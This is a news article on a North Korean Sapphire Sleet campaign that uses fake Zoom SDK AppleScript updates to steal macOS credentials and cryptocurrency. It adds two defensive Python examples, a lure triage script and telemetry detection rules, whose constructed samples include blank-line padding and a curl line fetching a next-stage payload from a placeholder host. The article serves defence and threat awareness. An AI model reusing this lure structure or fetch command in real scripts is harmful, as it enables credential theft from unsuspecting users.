North Korean criminals set on stealing Apple users’ credentials and cryptocurrency are using a combination of social engineering and a fake Zoom software update to trick people into manually running malware on their own computers, according to Microsoft.
Redmond’s threat intelligence team tracks the Pyongyang-backed crew as Sapphire Sleet (aka APT38). The Lazarus Group offshoot has been in business since at least 2020, and primarily targets the finance sector to steal cryptocurrency wallets and intellectual property related to cryptocurrency trading and blockchain platforms.
These attacks begin with social engineering. The crew creates fake recruiter profiles on social media and networking platforms like LinkedIn and then reaches out to finance professionals with phony job opportunities before scheduling a technical interview – that’s the delivery mechanism for the malware.
And they follow a rash of other social-engineering-enabled intrusions, including one in which North Korea-linked attackers socially engineered an Axios maintainer, compromised his account, and published malicious versions of the open source JavaScript library containing a remote-access trojan.
“Social engineering lets attackers route around hardened perimeters by convincing users to act on their behalf, turning a human into the vulnerability. It’s low-cost, hard to patch, and scales well,” Sherrod DeGrippo, Microsoft global threat intelligence GM, told The Register.
“Users are conditioned to accept remote support interactions like downloading tools, following instructions, clicking prompts,” she added. “Attackers exploit this familiarity to make malicious actions feel routine, lowering victim skepticism at the critical moment of compromise.”
In its latest campaign, Sapphire Sleet sends victims a fake Zoom support meeting invite, and then instructs them to download a file called Zoom SDK Update.scpt. It’s a compiled AppleScript that opens in macOS Script Editor by default and looks like a legitimate Zoom SDK update, beginning with a large comment block of update instructions to make it appear to be a real software update.
Bad Apple(Script) commands
Underneath the decoy content, the script inserts thousands of blank lines to push the malicious logic below the scrollable view of the Script Editor window and reduce the chances of the victim noticing it. First, it launches a command that invokes the legitimate macOS softwareupdate binary – but with an invalid parameter. This essentially does nothing but launch a trusted Apple‑signed process to make the software update look legitimate.
Next, the script executes its malicious payload via curl to fetch a new attacker-controlled AppleScript that launches directly within the Script Editor context and ensures that additional payloads are dynamically downloaded and executed.
“When the user opens the Zoom SDK Update.scpt file, macOS launches the file in Script Editor, allowing Sapphire Sleet to transition from a single lure file to a multi-stage, dynamically fetched payload chain,” Redmond explained in a Thursday report.
“From this single process, the entire attack unfolds through a cascading chain of curl commands, each fetching and executing progressively more complex AppleScript payloads. Each stage uses a distinct user-agent string as a campaign tracking identifier.”
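A defender who receives a suspected lure can decompile the `.scpt` to text (Apple's `osadecompile` does that on macOS) and look for the structural tells described above: a long run of blank lines, a trusted Apple binary invoked as a decoy, and curl fetching the next stage with a custom user-agent. The following Python triage script is an added example, not code from Microsoft's report or from the campaign; its sample scripts, the `--no-such-option` flag, the `placeholder.invalid` URL, the `placeholder-agent` user-agent and the 200-line padding threshold are all constructed assumptions.

```python
import re
from dataclasses import dataclass, field

# Constructed sample in the shape the article describes: a decoy comment block,
# thousands of blank lines, then the shell calls. The option, URL and user-agent
# value are placeholders, not indicators taken from the campaign.
SAMPLE_LURE = (
    "-- Zoom SDK Update\n"
    "-- Keep this window open until the update finishes.\n"
    + "\n" * 3000
    + 'do shell script "/usr/sbin/softwareupdate --no-such-option"\n'
    + 'do shell script "curl -s -A \'placeholder-agent\' https://placeholder.invalid/next"\n'
)

# Constructed benign script for comparison.
SAMPLE_BENIGN = (
    "-- Rename the first selected Finder item\n"
    'tell application "Finder" to set name of item 1 of selection to "report.txt"\n'
)

# Assumption: legitimate scripts are never padded with a run of blank lines this long.
BLANK_RUN_THRESHOLD = 200

# Matches the command string handed to `do shell script "..."` (escaped quotes allowed).
SHELL_CALL = re.compile(r'do shell script\s+"((?:[^"\\]|\\.)*)"')


@dataclass
class Triage:
    longest_blank_run: int
    findings: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # A single indicator is weak evidence; the lure pairs padding with a fetch.
        return len(self.findings) >= 2


def longest_blank_run(source: str) -> int:
    """Length of the longest run of consecutive blank lines in the script text."""
    run = best = 0
    for line in source.splitlines():
        if line.strip():
            run = 0
        else:
            run += 1
            best = max(best, run)
    return best


def triage(source: str) -> Triage:
    """Static triage of decompiled AppleScript text for the lure's structural tells."""
    result = Triage(longest_blank_run(source))
    if result.longest_blank_run >= BLANK_RUN_THRESHOLD:
        result.findings.append(
            f"padding: {result.longest_blank_run} consecutive blank lines push code out of view")
    for cmd in SHELL_CALL.findall(source):
        if re.search(r"\bsoftwareupdate\b", cmd):
            result.findings.append(f"decoy: trusted Apple binary invoked from script: {cmd}")
        if re.search(r"\bcurl\b", cmd):
            custom_ua = re.search(r"(\s-A\s|--user-agent)", cmd) is not None
            tag = " with custom user-agent" if custom_ua else ""
            result.findings.append(f"fetch: curl inside shell call{tag}: {cmd}")
        if re.search(r"\bosascript\b", cmd):
            result.findings.append(f"chain: nested osascript execution: {cmd}")
    return result


if __name__ == "__main__":
    for name, text in (("lure", SAMPLE_LURE), ("benign", SAMPLE_BENIGN)):
        verdict = triage(text)
        print(f"{name}: suspicious={verdict.suspicious}")
        for finding in verdict.findings:
            print("  -", finding)
```

The verdict requires two independent indicators because any one of them (a long blank run, a curl call) can appear in legitimate automation; the combination of padding plus a network fetch is what distinguishes this lure.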
Each curl request, distinguished by its user-agent string, fetches a different piece of malware that serves its own purpose in the attack chain: orchestration and backdooring victims’ machines; reconnaissance and registering the compromised system with Sapphire Sleet’s command‑and‑control (C2) infrastructure; bypassing macOS TCC protections; and ultimately harvesting credentials and exfiltrating sensitive data – wallets, browser history and other info, keychains, Apple Notes, and Telegram login details.
Each stage of the campaign also abuses native Apple tools or mimics Apple naming conventions to disguise the illicit activity. For example, the host-monitoring binary is named com.apple.cli, an Apple-style name that helps mask the 5 MB Mach-O executable.
The credential stealer, delivered through an AppleScript payload executed via osascript, drops a malicious macOS application named systemupdate.app that masquerades as a software update utility and, when launched, displays a native macOS password dialog that closely resembles a legitimate system prompt. The dialog prompts the user to enter their password “to complete a software update,” and this allows Sapphire Sleet to obtain valid user credentials, exfiltrating them by using the Telegram Bot API.
Additionally, one of the backdoors used in this campaign – icloudz – is named to mimic a legitimate iCloud‑related artifact, and also uses the macOS NSCreateObjectFileImageFromMemory API to load additional payloads directly into memory.
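The behaviours described in the last few paragraphs (curl and softwareupdate spawned from Script Editor, a com.apple.* binary living in a user directory, an "update"-named app bundle launched by osascript from a user-writable path) are visible in process-execution telemetry, whatever the hashes or domains happen to be. The rule set below is an added example written for this article, not a Microsoft or Apple detection; the event schema (parent name, process name, path, args), the Apple-owned path prefixes, and every sample event, path, option and user-agent value are constructed assumptions.

```python
import re

# Assumed event schema: a simplified process-execution record of the kind an EDR
# or Endpoint Security client emits (parent name, process name, path, args).
# Constructed sample events mirroring the article's chain; the paths, the option
# and the user-agent value are placeholders, not indicators from the campaign.
EVENTS = [
    {"parent": "Script Editor", "proc": "softwareupdate",
     "path": "/usr/sbin/softwareupdate", "args": ["--no-such-option"]},
    {"parent": "Script Editor", "proc": "curl", "path": "/usr/bin/curl",
     "args": ["-s", "-A", "placeholder-agent", "https://placeholder.invalid/next"]},
    {"parent": "osascript", "proc": "com.apple.cli",
     "path": "/Users/alice/Library/Caches/com.apple.cli", "args": []},
    {"parent": "osascript", "proc": "systemupdate",
     "path": "/tmp/systemupdate.app/Contents/MacOS/systemupdate", "args": []},
    # Two constructed events that should not fire: an admin's curl from Terminal
    # and softwareupdate run by launchd rather than by a script host.
    {"parent": "Terminal", "proc": "curl", "path": "/usr/bin/curl",
     "args": ["-sSL", "https://example.com/"]},
    {"parent": "launchd", "proc": "softwareupdate",
     "path": "/usr/sbin/softwareupdate", "args": ["--list"]},
]

# Assumption: Apple-shipped code lives under these prefixes; a binary named like
# an Apple component anywhere else deserves a look.
APPLE_OWNED_PREFIXES = ("/System/", "/usr/", "/bin/", "/sbin/", "/Library/Apple/")
TRUSTED_APP_PREFIXES = ("/Applications/", "/System/")
SCRIPT_HOSTS = {"Script Editor", "osascript"}


def from_script_host(ev):
    return ev["parent"] in SCRIPT_HOSTS


def rule_script_host_curl(ev):
    """The fetch step: curl spawned by an AppleScript host, worse with a custom UA."""
    if from_script_host(ev) and ev["proc"] == "curl":
        args = ev["args"]
        custom_ua = "-A" in args or any(a.startswith("--user-agent") for a in args)
        return "script_host_curl" + ("_custom_ua" if custom_ua else "")
    return None


def rule_decoy_softwareupdate(ev):
    """The decoy step: the real softwareupdate binary launched from a script host."""
    if from_script_host(ev) and ev["proc"] == "softwareupdate":
        return "softwareupdate_from_script_host"
    return None


def rule_apple_name_outside_apple_path(ev):
    """Apple-style name (com.apple.*) on a binary outside Apple-owned paths."""
    if re.match(r"com\.apple\.", ev["proc"]) and not ev["path"].startswith(APPLE_OWNED_PREFIXES):
        return "apple_style_name_in_user_path"
    return None


def rule_update_lookalike_app(ev):
    """An 'update'-named .app bundle launched by a script host from a user-writable path."""
    path = ev["path"]
    if (from_script_host(ev) and "update" in ev["proc"].lower()
            and ".app/" in path and not path.startswith(TRUSTED_APP_PREFIXES)):
        return "update_lookalike_app_from_script_host"
    return None


RULES = (rule_script_host_curl, rule_decoy_softwareupdate,
         rule_apple_name_outside_apple_path, rule_update_lookalike_app)


def detect(events):
    """Run every rule over every event; return (rule_name, executable path) pairs."""
    alerts = []
    for ev in events:
        for rule in RULES:
            hit = rule(ev)
            if hit:
                alerts.append((hit, ev["path"]))
    return alerts


if __name__ == "__main__":
    for name, path in detect(EVENTS):
        print(f"ALERT {name}: {path}")
```

Keying the rules on the parent process rather than on the child alone is what keeps the false-positive rate down: curl and softwareupdate are everyday tools, but neither has a good reason to be launched by Script Editor or osascript on a finance professional's laptop.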
Microsoft disclosed this campaign to Apple, and the Mac maker has since implemented “platform-level protections to help detect and block infrastructure and malware associated with this campaign,” we’re told. Apple did not respond to The Register’s inquiries.
According to Redmond, however, Apple deployed Apple Safe Browsing protections in Safari to detect and block malicious infrastructure associated with this campaign, and also deployed XProtect signatures to detect and block the malware families linked to Sapphire Sleet. macOS devices receive these signature updates automatically, so users need not do anything themselves.
One thing organizations can do to protect their users and themselves from falling victim to this and other social-engineering campaigns is to educate people about threats originating from LinkedIn and other social media sites, especially unsolicited communications asking users to download software or install virtual meeting tools.
“Users should never run scripts or commands shared through messages, calls, or chats without prior approval from their IT or security teams,” Redmond warns. ®